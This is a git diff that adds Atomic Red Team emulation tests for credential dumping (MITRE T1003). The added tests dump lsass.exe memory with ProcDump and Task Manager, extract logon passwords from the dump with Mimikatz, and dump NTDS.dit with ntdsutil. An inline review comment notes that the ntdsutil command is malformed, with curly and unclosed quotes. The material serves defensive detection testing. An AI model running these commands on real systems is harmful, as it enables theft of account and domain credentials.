diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index f75b91da..4baf9220 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md @@ -147,6 +147,14 @@ Contributors: Vincent Le Toux, Ed Williams, Trustwave, SpiderLabs - [Atomic Test #4 - Registry dump of SAM, creds, and secrets](#atomic-test-4---registry-dump-of-sam-creds-and-secrets) +- [Atomic Test #5 - Dump LSASS.exe Memory using ProcDump](#atomic-test-5---dump-lsassexe-memory-using-procdump) + +- [Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-6---dump-lsassexe-memory-using-windows-task-manager) + +- [Atomic Test #7 - Offline Credential Theft With Mimikatz](#atomic-test-7---offline-credential-theft-with-mimikatz) + +- [Atomic Test #8 - Dump Active Directory Database with NTDSUtil](#atomic-test-8---dump-active-directory-database-with-ntdsutil) +
@@ -213,3 +221,91 @@ reg save HKLM\system system reg save HKLM\security security ```
+
+ +## Atomic Test #5 - Dump LSASS.exe Memory using ProcDump +The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals +ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where resulting dump should be placed | Path | lsass_dump.dmp| + +#### Run it with `command_prompt`! +``` +procdump.exe -accepteula -ma lsass.exe #{output_file} +``` +
+
+ +## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager +The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task +Manager and administrative permissions. + +**Supported Platforms:** Windows + + +#### Run it with these steps! +1. Open Task Manager: + On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking + on the task bar and selecting "Task Manager". + +2. Select lsass.exe: + If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe + and select it for manipulation. + +3. Dump lsass.exe memory: + Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file. + + +
+
+ +## Atomic Test #7 - Offline Credential Theft With Mimikatz +The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with +Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| input_file | Path where resulting dump should be placed | Path | lsass_dump.dmp| + +#### Run it with these steps! +1. Open Mimikatz: + Execute `mimikatz` at a command prompt. + +2. Select a Memory Dump: + Within the Mimikatz interactive shell, execute `sekurlsa::minidump #{input_file}` + +3. Obtain Credentials: + Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full` + + +
+
+ +## Atomic Test #8 - Dump Active Directory Database with NTDSUtil +The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability +uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of +subsequent domain controllers without the need of network-based replication. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_folder | Path where resulting dump should be placed | Path | C:\Atomic_Red_Team| + +#### Run it with `command_prompt`! +``` +ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q +``` +
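Review bot: the `ntdsutil` command in Atomic Test #8 will not run as written: the quotes are typographic curly quotes (“ ”), which `cmd.exe` does not treat as string delimiters, and the `“create full #{output_folder}` argument has no closing quote, so the path and the two trailing `q` tokens are not passed as separate arguments; use straight ASCII quotes and close the argument, e.g. `ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q`. In Atomic Test #7 the `input_file` description reads "Path where resulting dump should be placed", copied from the `output_file` row of Test #5; this input is the dump that Mimikatz reads, so describe it as the path of the lsass.exe memory dump to analyse. Tests #5 and #8 state no prerequisites, while Test #6 notes that administrative permissions are required; add the same statement to #5 (dumping lsass.exe with ProcDump needs elevation, and `procdump.exe` must be on the PATH or given by full path) and note for #8 that the IFM snapshot has to be created on a domain controller with elevated rights.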
diff --git a/atomics/index.md b/atomics/index.md index d5601c1a..837bfc9f 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -421,6 +421,10 @@ - Atomic Test #2: Gsecdump [windows] - Atomic Test #3: Windows Credential Editor [windows] - Atomic Test #4: Registry dump of SAM, creds, and secrets [windows] + - Atomic Test #5: Dump LSASS.exe Memory using ProcDump [windows] + - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows] + - Atomic Test #7: Offline Credential Theft With Mimikatz [windows] + - Atomic Test #8: Dump Active Directory Database with NTDSUtil [windows] - [T1081 Credentials in Files](./T1081/T1081.md) - Atomic Test #1: Browser and System credentials [macos] - Atomic Test #2: Extract credentials from files [macos, linux] diff --git a/atomics/windows-index.md b/atomics/windows-index.md index de159f00..a767df04 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -284,6 +284,10 @@ - Atomic Test #2: Gsecdump [windows] - Atomic Test #3: Windows Credential Editor [windows] - Atomic Test #4: Registry dump of SAM, creds, and secrets [windows] + - Atomic Test #5: Dump LSASS.exe Memory using ProcDump [windows] + - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows] + - Atomic Test #7: Offline Credential Theft With Mimikatz [windows] + - Atomic Test #8: Dump Active Directory Database with NTDSUtil [windows] - [T1081 Credentials in Files](./T1081/T1081.md) - Atomic Test #3: Mimikatz & Kittenz [windows] - Atomic Test #4: Extracting credentials from files [windows]